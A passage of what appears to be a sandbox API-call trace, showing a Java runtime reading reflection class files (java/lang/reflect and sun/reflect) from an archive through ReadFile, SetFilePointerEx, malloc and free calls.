(_Block=0x2111af0) [0090.384] strlen (_Str="java/lang/reflect/Member.class") returned 0x1e [0090.384] malloc (_Size=0x48) returned 0x2111ff0 [0090.384] malloc (_Size=0xa0) returned 0x121a6990 [0090.384] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341ef76, lpNewFilePointer=0x208e740, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e740*=54652790) returned 1 [0090.384] ReadFile (in: hFile=0x134, lpBuffer=0x121a6990, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208e710, lpOverlapped=0x0 | out: lpBuffer=0x121a6990*, lpNumberOfBytesRead=0x208e710*=0xa0, lpOverlapped=0x0) returned 1 [0090.385] malloc (_Size=0x1f) returned 0x2114050 [0090.386] free (_Block=0x121a6990) [0090.386] strlen (_Str="java/lang/reflect/Member.class") returned 0x1e [0090.386] strcpy (in: _Dest=0x208e8c0, _Source="java/lang/reflect/Member.class" | out: _Dest="java/lang/reflect/Member.class") returned="java/lang/reflect/Member.class" [0090.386] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x322160d, lpNewFilePointer=0x208e340, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e340*=52565517) returned 1 [0090.386] ReadFile (in: hFile=0x134, lpBuffer=0x208e390, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208e310, lpOverlapped=0x0 | out: lpBuffer=0x208e390*, lpNumberOfBytesRead=0x208e310*=0x1e, lpOverlapped=0x0) returned 1 [0090.387] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3221649, lpNewFilePointer=0x208e3a0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e3a0*=52565577) returned 1 [0090.387] ReadFile (in: hFile=0x134, lpBuffer=0x121b7240, nNumberOfBytesToRead=0x15f, lpNumberOfBytesRead=0x208e370, lpOverlapped=0x0 | out: lpBuffer=0x121b7240*, lpNumberOfBytesRead=0x208e370*=0x15f, lpOverlapped=0x0) returned 1 [0090.387] free (_Block=0x2113f30) [0090.387] free (_Block=0x2111c30) [0090.410] strlen (_Str="java/lang/reflect/Parameter.class") returned 0x21 [0090.410] malloc (_Size=0x48) returned 0x2112680 [0090.410] malloc (_Size=0xa0) returned 0x121a6990 [0090.411] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341ef27, lpNewFilePointer=0x208f200, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208f200*=54652711) returned 1 [0090.411] ReadFile (in: hFile=0x134, lpBuffer=0x121a6990, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208f1d0, lpOverlapped=0x0 | out: lpBuffer=0x121a6990*, lpNumberOfBytesRead=0x208f1d0*=0xa0, lpOverlapped=0x0) returned 1 [0090.411] malloc (_Size=0x22) returned 0x2114260 [0090.412] free (_Block=0x121a6990) [0090.412] strlen (_Str="java/lang/reflect/Parameter.class") returned 0x21 [0090.412] strcpy (in: _Dest=0x208f380, _Source="java/lang/reflect/Parameter.class" | out: _Dest="java/lang/reflect/Parameter.class") returned="java/lang/reflect/Parameter.class" [0090.412] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3220456, lpNewFilePointer=0x208ee00, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ee00*=52560982) returned 1 [0090.412] ReadFile (in: hFile=0x134, lpBuffer=0x208ee50, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208edd0, lpOverlapped=0x0 | out: lpBuffer=0x208ee50*, lpNumberOfBytesRead=0x208edd0*=0x1e, lpOverlapped=0x0) returned 1 [0090.415] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3220495, lpNewFilePointer=0x208ee60, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ee60*=52561045) returned 1 [0090.415] ReadFile (in: hFile=0x134, lpBuffer=0x121b4af0, nNumberOfBytesToRead=0x1178, lpNumberOfBytesRead=0x208ee30, lpOverlapped=0x0 | out: lpBuffer=0x121b4af0*, lpNumberOfBytesRead=0x208ee30*=0x1178, lpOverlapped=0x0) returned 1 [0090.415] free (_Block=0x2114050) [0090.415] free (_Block=0x2111ff0) [0090.422] strlen (_Str="java/lang/reflect/Method.class") returned 0x1e [0090.422] malloc (_Size=0x48) returned 0x2111870 [0090.422] malloc (_Size=0xa0) returned 0x121a6990 [0090.422] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341eedb, lpNewFilePointer=0x208f200, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208f200*=54652635) returned 1 [0090.422] ReadFile (in: hFile=0x134, lpBuffer=0x121a6990, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208f1d0, lpOverlapped=0x0 | out: lpBuffer=0x121a6990*, lpNumberOfBytesRead=0x208f1d0*=0xa0, lpOverlapped=0x0) returned 1 [0090.423] malloc (_Size=0x1f) returned 0x2114140 [0090.423] free (_Block=0x121a6990) [0090.423] strlen (_Str="java/lang/reflect/Method.class") returned 0x1e [0090.424] strcpy (in: _Dest=0x208f380, _Source="java/lang/reflect/Method.class" | out: _Dest="java/lang/reflect/Method.class") returned="java/lang/reflect/Method.class" [0090.424] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x321e4b0, lpNewFilePointer=0x208ee00, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ee00*=52552880) returned 1 [0090.424] ReadFile (in: hFile=0x134, lpBuffer=0x208ee50, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208edd0, lpOverlapped=0x0 | out: lpBuffer=0x208ee50*, lpNumberOfBytesRead=0x208edd0*=0x1e, lpOverlapped=0x0) returned 1 [0090.425] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x321e4ec, lpNewFilePointer=0x208ee60, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ee60*=52552940) returned 1 [0090.425] ReadFile (in: hFile=0x134, lpBuffer=0x121b4af0, nNumberOfBytesToRead=0x1f6a, lpNumberOfBytesRead=0x208ee30, lpOverlapped=0x0 | out: lpBuffer=0x121b4af0*, lpNumberOfBytesRead=0x208ee30*=0x1f6a, lpOverlapped=0x0) returned 1 [0090.426] free (_Block=0x2114260) [0090.427] free (_Block=0x2112680) [0090.435] strlen (_Str="java/lang/reflect/Executable.class") returned 0x22 [0090.435] malloc (_Size=0x48) returned 0x2111ff0 [0090.435] malloc (_Size=0xa0) returned 0x121a6990 [0090.435] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341ee8b, lpNewFilePointer=0x208e7c0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e7c0*=54652555) returned 1 [0090.436] ReadFile (in: hFile=0x134, lpBuffer=0x121a6990, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208e790, lpOverlapped=0x0 | out: lpBuffer=0x121a6990*, lpNumberOfBytesRead=0x208e790*=0xa0, lpOverlapped=0x0) returned 1 [0090.437] malloc (_Size=0x23) returned 0x2114260 [0090.438] free (_Block=0x121a6990) [0090.438] strlen (_Str="java/lang/reflect/Executable.class") returned 0x22 [0090.438] strcpy (in: _Dest=0x208e940, _Source="java/lang/reflect/Executable.class" | out: _Dest="java/lang/reflect/Executable.class") returned="java/lang/reflect/Executable.class" [0090.438] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x321bf69, lpNewFilePointer=0x208e3c0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e3c0*=52543337) returned 1 [0090.438] ReadFile (in: hFile=0x134, lpBuffer=0x208e410, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208e390, lpOverlapped=0x0 | out: lpBuffer=0x208e410*, lpNumberOfBytesRead=0x208e390*=0x1e, lpOverlapped=0x0) returned 1 [0090.441] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x321bfa9, lpNewFilePointer=0x208e420, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e420*=52543401) returned 1 [0090.441] ReadFile (in: hFile=0x134, lpBuffer=0x121b6c00, nNumberOfBytesToRead=0x2507, lpNumberOfBytesRead=0x208e3f0, lpOverlapped=0x0 | out: lpBuffer=0x121b6c00*, lpNumberOfBytesRead=0x208e3f0*=0x2507, lpOverlapped=0x0) returned 1 [0090.442] free (_Block=0x2114140) [0090.442] free (_Block=0x2111870) [0090.459] strlen (_Str="java/lang/reflect/Constructor.class") returned 0x23 [0090.459] malloc (_Size=0x48) returned 0x2111af0 [0090.459] malloc (_Size=0xa0) returned 0x121a6990 [0090.459] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341ee3a, lpNewFilePointer=0x208f200, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208f200*=54652474) returned 1 [0090.459] ReadFile (in: hFile=0x134, lpBuffer=0x121a6990, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208f1d0, lpOverlapped=0x0 | out: lpBuffer=0x121a6990*, lpNumberOfBytesRead=0x208f1d0*=0xa0, lpOverlapped=0x0) returned 1 [0090.460] malloc (_Size=0x24) returned 0x21140e0 [0090.460] free (_Block=0x121a6990) [0090.460] strlen (_Str="java/lang/reflect/Constructor.class") returned 0x23 [0090.460] strcpy (in: _Dest=0x208f380, _Source="java/lang/reflect/Constructor.class" | out: _Dest="java/lang/reflect/Constructor.class") returned="java/lang/reflect/Constructor.class" [0090.461] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x321a007, lpNewFilePointer=0x208ee00, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ee00*=52535303) returned 1 [0090.461] ReadFile (in: hFile=0x134, lpBuffer=0x208ee50, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208edd0, lpOverlapped=0x0 | out: lpBuffer=0x208ee50*, lpNumberOfBytesRead=0x208edd0*=0x1e, lpOverlapped=0x0) returned 1 [0090.462] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x321a048, lpNewFilePointer=0x208ee60, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ee60*=52535368) returned 1 [0090.462] ReadFile (in: hFile=0x134, lpBuffer=0x121b4af0, nNumberOfBytesToRead=0x1f21, lpNumberOfBytesRead=0x208ee30, lpOverlapped=0x0 | out: lpBuffer=0x121b4af0*, lpNumberOfBytesRead=0x208ee30*=0x1f21, lpOverlapped=0x0) returned 1 [0090.463] free (_Block=0x2114260) [0090.463] free (_Block=0x2111ff0) [0090.475] strlen (_Str="sun/reflect/MagicAccessorImpl.class") returned 0x23 [0090.475] malloc (_Size=0x48) returned 0x2112680 [0090.475] malloc (_Size=0xa0) returned 0x121a6990 [0090.475] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341ede9, lpNewFilePointer=0x208f200, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208f200*=54652393) returned 1 [0090.475] ReadFile (in: hFile=0x134, lpBuffer=0x121a6990, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208f1d0, lpOverlapped=0x0 | out: lpBuffer=0x121a6990*, lpNumberOfBytesRead=0x208f1d0*=0xa0, lpOverlapped=0x0) returned 1 [0090.476] malloc (_Size=0x24) returned 0x2114290 [0090.476] free (_Block=0x121a6990) [0090.476] strlen (_Str="sun/reflect/MagicAccessorImpl.class") returned 0x23 [0090.476] strcpy (in: _Dest=0x208f380, _Source="sun/reflect/MagicAccessorImpl.class" | out: _Dest="sun/reflect/MagicAccessorImpl.class") returned="sun/reflect/MagicAccessorImpl.class" [0090.477] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3219f36, lpNewFilePointer=0x208ee00, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ee00*=52535094) returned 1 [0090.477] ReadFile (in: hFile=0x134, lpBuffer=0x208ee50, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208edd0, lpOverlapped=0x0 | out: lpBuffer=0x208ee50*, lpNumberOfBytesRead=0x208edd0*=0x1e, lpOverlapped=0x0) returned 1 [0090.478] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3219f77, lpNewFilePointer=0x208ee60, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ee60*=52535159) returned 1 [0090.478] ReadFile (in: hFile=0x134, lpBuffer=0x20fe990, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x208ee30, lpOverlapped=0x0 | out: lpBuffer=0x20fe990*, lpNumberOfBytesRead=0x208ee30*=0x90, lpOverlapped=0x0) returned 1 [0090.479] free (_Block=0x21140e0) [0090.479] free (_Block=0x2111af0) [0090.481] strlen (_Str="sun/reflect/MethodAccessorImpl.class") returned 0x24 [0090.481] malloc (_Size=0x48) returned 0x2111ff0 [0090.481] malloc (_Size=0xa0) returned 0x21fe880 [0090.482] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341ed97, lpNewFilePointer=0x208f200, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208f200*=54652311) returned 1 [0090.482] ReadFile (in: hFile=0x134, lpBuffer=0x21fe880, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208f1d0, lpOverlapped=0x0 | out: lpBuffer=0x21fe880*, lpNumberOfBytesRead=0x208f1d0*=0xa0, lpOverlapped=0x0) returned 1 [0090.483] malloc (_Size=0x25) returned 0x21143e0 [0090.483] free (_Block=0x21fe880) [0090.483] strlen (_Str="sun/reflect/MethodAccessorImpl.class") returned 0x24 [0090.483] strcpy (in: _Dest=0x208f380, _Source="sun/reflect/MethodAccessorImpl.class" | out: _Dest="sun/reflect/MethodAccessorImpl.class") returned="sun/reflect/MethodAccessorImpl.class" [0090.483] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3219d75, lpNewFilePointer=0x208ee00, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ee00*=52534645) returned 1 [0090.483] ReadFile (in: hFile=0x134, lpBuffer=0x208ee50, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208edd0, lpOverlapped=0x0 | out: lpBuffer=0x208ee50*, lpNumberOfBytesRead=0x208edd0*=0x1e, lpOverlapped=0x0) returned 1 [0090.484] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3219db7, lpNewFilePointer=0x208ee60, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ee60*=52534711) returned 1 [0090.484] ReadFile (in: hFile=0x134, lpBuffer=0x20fe990, nNumberOfBytesToRead=0x17f, lpNumberOfBytesRead=0x208ee30, lpOverlapped=0x0 | out: lpBuffer=0x20fe990*, lpNumberOfBytesRead=0x208ee30*=0x17f, lpOverlapped=0x0) returned 1 [0090.485] free (_Block=0x2114290) [0090.485] free (_Block=0x2112680) [0090.486] strlen (_Str="sun/reflect/MethodAccessor.class") returned 0x20 [0090.486] malloc (_Size=0x48) returned 0x2112680 [0090.486] malloc (_Size=0xa0) returned 0x21fe880 [0090.486] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341ed49, lpNewFilePointer=0x208e740, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e740*=54652233) returned 1 [0090.486] ReadFile (in: hFile=0x134, lpBuffer=0x21fe880, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208e710, lpOverlapped=0x0 | out: lpBuffer=0x21fe880*, lpNumberOfBytesRead=0x208e710*=0xa0, lpOverlapped=0x0) returned 1 [0090.487] malloc (_Size=0x21) returned 0x2114050 [0090.487] free (_Block=0x21fe880) [0090.487] strlen (_Str="sun/reflect/MethodAccessor.class") returned 0x20 [0090.487] strcpy (in: _Dest=0x208e8c0, _Source="sun/reflect/MethodAccessor.class" | out: _Dest="sun/reflect/MethodAccessor.class") returned="sun/reflect/MethodAccessor.class" [0090.487] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3219c2a, lpNewFilePointer=0x208e340, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e340*=52534314) returned 1 [0090.487] ReadFile (in: hFile=0x134, lpBuffer=0x208e390, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208e310, lpOverlapped=0x0 | out: lpBuffer=0x208e390*, lpNumberOfBytesRead=0x208e310*=0x1e, lpOverlapped=0x0) returned 1 [0090.488] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3219c68, lpNewFilePointer=0x208e3a0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e3a0*=52534376) returned 1 [0090.488] ReadFile (in: hFile=0x134, lpBuffer=0x121b4c40, nNumberOfBytesToRead=0x10d, lpNumberOfBytesRead=0x208e370, lpOverlapped=0x0 | out: lpBuffer=0x121b4c40*, lpNumberOfBytesRead=0x208e370*=0x10d, lpOverlapped=0x0) returned 1 [0090.489] free (_Block=0x21143e0) [0090.489] free (_Block=0x2111ff0) [0090.493] strlen (_Str="sun/reflect/ConstructorAccessorImpl.class") returned 0x29 [0090.493] malloc (_Size=0x48) returned 0x2111870 [0090.493] malloc (_Size=0xa0) returned 0x21fe880 [0090.493] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341ecf2, lpNewFilePointer=0x208f200, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208f200*=54652146) returned 1 [0090.493] ReadFile (in: hFile=0x134, lpBuffer=0x21fe880, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208f1d0, lpOverlapped=0x0 | out: lpBuffer=0x21fe880*, lpNumberOfBytesRead=0x208f1d0*=0xa0, lpOverlapped=0x0) returned 1 [0090.494] malloc (_Size=0x2a) returned 0x2112f20 [0090.494] free (_Block=0x21fe880) [0090.495] strlen (_Str="sun/reflect/ConstructorAccessorImpl.class") returned 0x29 [0090.495] strcpy (in: _Dest=0x208f380, _Source="sun/reflect/ConstructorAccessorImpl.class" | out: _Dest="sun/reflect/ConstructorAccessorImpl.class") returned="sun/reflect/ConstructorAccessorImpl.class" [0090.495] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3219a3f, lpNewFilePointer=0x208ee00, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ee00*=52533823) returned 1 [0090.495] ReadFile (in: hFile=0x134, lpBuffer=0x208ee50, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208edd0, lpOverlapped=0x0 | out: lpBuffer=0x208ee50*, lpNumberOfBytesRead=0x208edd0*=0x1e, lpOverlapped=0x0) returned 1 [0090.496] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3219a86, lpNewFilePointer=0x208ee60, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ee60*=52533894) returned 1 [0090.496] ReadFile (in: hFile=0x134, lpBuffer=0x20fe9b0, nNumberOfBytesToRead=0x1a4, lpNumberOfBytesRead=0x208ee30, lpOverlapped=0x0 | out: lpBuffer=0x20fe9b0*, lpNumberOfBytesRead=0x208ee30*=0x1a4, lpOverlapped=0x0) returned 1 [0090.496] free (_Block=0x2114050) [0090.497] free (_Block=0x2112680) [0090.498] strlen (_Str="sun/reflect/ConstructorAccessor.class") returned 0x25 [0090.498] malloc (_Size=0x48) returned 0x2111af0 [0090.498] malloc (_Size=0xa0) returned 0x21fe880 [0090.498] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341ec9f, lpNewFilePointer=0x208e740, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e740*=54652063) returned 1 [0090.498] ReadFile (in: hFile=0x134, lpBuffer=0x21fe880, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208e710, lpOverlapped=0x0 | out: lpBuffer=0x21fe880*, lpNumberOfBytesRead=0x208e710*=0xa0, lpOverlapped=0x0) returned 1 [0090.499] malloc (_Size=0x26) returned 0x2113f30 [0090.499] free (_Block=0x21fe880) [0090.500] strlen (_Str="sun/reflect/ConstructorAccessor.class") returned 0x25 [0090.500] strcpy (in: _Dest=0x208e8c0, _Source="sun/reflect/ConstructorAccessor.class" | out: _Dest="sun/reflect/ConstructorAccessor.class") returned="sun/reflect/ConstructorAccessor.class" [0090.500] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x32198cf, lpNewFilePointer=0x208e340, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e340*=52533455) returned 1 [0090.500] ReadFile (in: hFile=0x134, lpBuffer=0x208e390, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208e310, lpOverlapped=0x0 | out: lpBuffer=0x208e390*, lpNumberOfBytesRead=0x208e310*=0x1e, lpOverlapped=0x0) returned 1 [0090.501] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3219912, lpNewFilePointer=0x208e3a0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e3a0*=52533522) returned 1 [0090.501] ReadFile (in: hFile=0x134, lpBuffer=0x121b4c40, nNumberOfBytesToRead=0x12d, lpNumberOfBytesRead=0x208e370, lpOverlapped=0x0 | out: lpBuffer=0x121b4c40*, lpNumberOfBytesRead=0x208e370*=0x12d, lpOverlapped=0x0) returned 1 [0090.501] free (_Block=0x2112f20) [0090.504] free (_Block=0x2111870) [0090.509] strlen (_Str="sun/reflect/DelegatingClassLoader.class") returned 0x27 [0090.509] malloc (_Size=0x48) returned 0x2111c80 [0090.509] malloc (_Size=0xa0) returned 0x21fe880 [0090.509] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341ec4a, lpNewFilePointer=0x208f200, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208f200*=54651978) returned 1 [0090.510] ReadFile (in: hFile=0x134, lpBuffer=0x21fe880, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208f1d0, lpOverlapped=0x0 | out: lpBuffer=0x21fe880*, lpNumberOfBytesRead=0x208f1d0*=0xa0, lpOverlapped=0x0) returned 1 [0090.511] malloc (_Size=0x28) returned 0x21144a0 [0090.511] free (_Block=0x21fe880) [0090.511] strlen (_Str="sun/reflect/DelegatingClassLoader.class") returned 0x27 [0090.511] strcpy (in: _Dest=0x208f380, _Source="sun/reflect/DelegatingClassLoader.class" | out: _Dest="sun/reflect/DelegatingClassLoader.class") returned="sun/reflect/DelegatingClassLoader.class" [0090.511] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x32197d9, lpNewFilePointer=0x208ee00, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ee00*=52533209) returned 1 [0090.511] ReadFile (in: hFile=0x134, lpBuffer=0x208ee50, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208edd0, lpOverlapped=0x0 | out: lpBuffer=0x208ee50*, lpNumberOfBytesRead=0x208edd0*=0x1e, lpOverlapped=0x0) returned 1 [0090.564] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x321981e, lpNewFilePointer=0x208ee60, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ee60*=52533278) returned 1 [0090.564] ReadFile (in: hFile=0x134, lpBuffer=0x20fe9b0, nNumberOfBytesToRead=0xb1, lpNumberOfBytesRead=0x208ee30, lpOverlapped=0x0 | out: lpBuffer=0x20fe9b0*, lpNumberOfBytesRead=0x208ee30*=0xb1, lpOverlapped=0x0) returned 1 [0090.565] free (_Block=0x2113f30) [0090.565] free (_Block=0x2111af0) [0090.568] strlen (_Str="sun/reflect/ConstantPool.class") returned 0x1e [0090.569] malloc (_Size=0x48) returned 0x2112680 [0090.569] malloc (_Size=0xa0) returned 0x21fe880 [0090.569] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341ebfe, lpNewFilePointer=0x208f200, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208f200*=54651902) returned 1 [0090.569] ReadFile (in: hFile=0x134, lpBuffer=0x21fe880, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208f1d0, lpOverlapped=0x0 | out: lpBuffer=0x21fe880*, lpNumberOfBytesRead=0x208f1d0*=0xa0, lpOverlapped=0x0) returned 1 [0090.570] malloc (_Size=0x1f) returned 0x2114260 [0090.570] free (_Block=0x21fe880) [0090.571] strlen (_Str="sun/reflect/ConstantPool.class") returned 0x1e [0090.571] strcpy (in: _Dest=0x208f380, _Source="sun/reflect/ConstantPool.class" | out: _Dest="sun/reflect/ConstantPool.class") returned="sun/reflect/ConstantPool.class" [0090.571] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3218f04, lpNewFilePointer=0x208ee00, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ee00*=52530948) returned 1 [0090.571] ReadFile (in: hFile=0x134, lpBuffer=0x208ee50, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208edd0, lpOverlapped=0x0 | out: lpBuffer=0x208ee50*, lpNumberOfBytesRead=0x208edd0*=0x1e, lpOverlapped=0x0) returned 1 [0090.573] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3218f40, lpNewFilePointer=0x208ee60, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ee60*=52531008) returned 1 [0090.573] ReadFile (in: hFile=0x134, lpBuffer=0x121b4af0, nNumberOfBytesToRead=0x899, lpNumberOfBytesRead=0x208ee30, lpOverlapped=0x0 | out: lpBuffer=0x121b4af0*, lpNumberOfBytesRead=0x208ee30*=0x899, lpOverlapped=0x0) returned 1 [0090.573] free (_Block=0x21144a0) [0090.574] free (_Block=0x2111c80) [0090.584] strlen (_Str="sun/reflect/UnsafeStaticFieldAccessorImpl.class") returned 0x2f [0090.584] malloc (_Size=0x48) returned 0x2111870 [0090.584] malloc (_Size=0xa0) returned 0x21fe880 [0090.584] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341eba1, lpNewFilePointer=0x208f200, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208f200*=54651809) returned 1 [0090.584] ReadFile (in: hFile=0x134, lpBuffer=0x21fe880, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208f1d0, lpOverlapped=0x0 | out: lpBuffer=0x21fe880*, lpNumberOfBytesRead=0x208f1d0*=0xa0, lpOverlapped=0x0) returned 1 [0090.585] malloc (_Size=0x30) returned 0x2112d60 [0090.586] free (_Block=0x21fe880) [0090.586] strlen (_Str="sun/reflect/UnsafeStaticFieldAccessorImpl.class") returned 0x2f [0090.586] strcpy (in: _Dest=0x208f380, _Source="sun/reflect/UnsafeStaticFieldAccessorImpl.class" | out: _Dest="sun/reflect/UnsafeStaticFieldAccessorImpl.class") returned="sun/reflect/UnsafeStaticFieldAccessorImpl.class" [0090.586] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3218c71, lpNewFilePointer=0x208ee00, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ee00*=52530289) returned 1 [0090.586] ReadFile (in: hFile=0x134, lpBuffer=0x208ee50, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208edd0, lpOverlapped=0x0 | out: lpBuffer=0x208ee50*, lpNumberOfBytesRead=0x208edd0*=0x1e, lpOverlapped=0x0) returned 1 [0090.587] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3218cbe, lpNewFilePointer=0x208ee60, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ee60*=52530366) returned 1 [0090.587] ReadFile (in: hFile=0x134, lpBuffer=0x121b4af0, nNumberOfBytesToRead=0x246, lpNumberOfBytesRead=0x208ee30, lpOverlapped=0x0 | out: lpBuffer=0x121b4af0*, lpNumberOfBytesRead=0x208ee30*=0x246, lpOverlapped=0x0) returned 1 [0090.587] free (_Block=0x2114260) [0090.588] free (_Block=0x2112680) [0090.590] strlen (_Str="sun/reflect/UnsafeFieldAccessorImpl.class") returned 0x29 [0090.590] malloc (_Size=0x48) returned 0x2111ff0 [0090.590] malloc (_Size=0xa0) returned 0x21fe880 [0090.590] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341eb4a, lpNewFilePointer=0x208e7c0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e7c0*=54651722) returned 1 [0090.590] ReadFile (in: hFile=0x134, lpBuffer=0x21fe880, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208e790, lpOverlapped=0x0 | out: lpBuffer=0x21fe880*, lpNumberOfBytesRead=0x208e790*=0xa0, lpOverlapped=0x0) returned 1 [0090.591] malloc (_Size=0x2a) returned 0x21129a0 [0090.591] free (_Block=0x21fe880) [0090.591] strlen (_Str="sun/reflect/UnsafeFieldAccessorImpl.class") returned 0x29 [0090.591] strcpy (in: _Dest=0x208e940, _Source="sun/reflect/UnsafeFieldAccessorImpl.class" | out: _Dest="sun/reflect/UnsafeFieldAccessorImpl.class") returned="sun/reflect/UnsafeFieldAccessorImpl.class" [0090.592] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3217a99, lpNewFilePointer=0x208e3c0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e3c0*=52525721) returned 1 [0090.592] ReadFile (in: hFile=0x134, lpBuffer=0x208e410, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208e390, lpOverlapped=0x0 | out: lpBuffer=0x208e410*, lpNumberOfBytesRead=0x208e390*=0x1e, lpOverlapped=0x0) returned 1 [0090.594] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3217ae0, lpNewFilePointer=0x208e420, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e420*=52525792) returned 1 [0090.594] ReadFile (in: hFile=0x134, lpBuffer=0x121b4f00, nNumberOfBytesToRead=0x1191, lpNumberOfBytesRead=0x208e3f0, lpOverlapped=0x0 | out: lpBuffer=0x121b4f00*, lpNumberOfBytesRead=0x208e3f0*=0x1191, lpOverlapped=0x0) returned 1 [0090.594] free (_Block=0x2112d60) [0090.595] free (_Block=0x2111870) [0090.605] strlen (_Str="sun/reflect/FieldAccessorImpl.class") returned 0x23 [0090.605] malloc (_Size=0x48) returned 0x2111af0 [0090.605] malloc (_Size=0xa0) returned 0x21fe880 [0090.605] 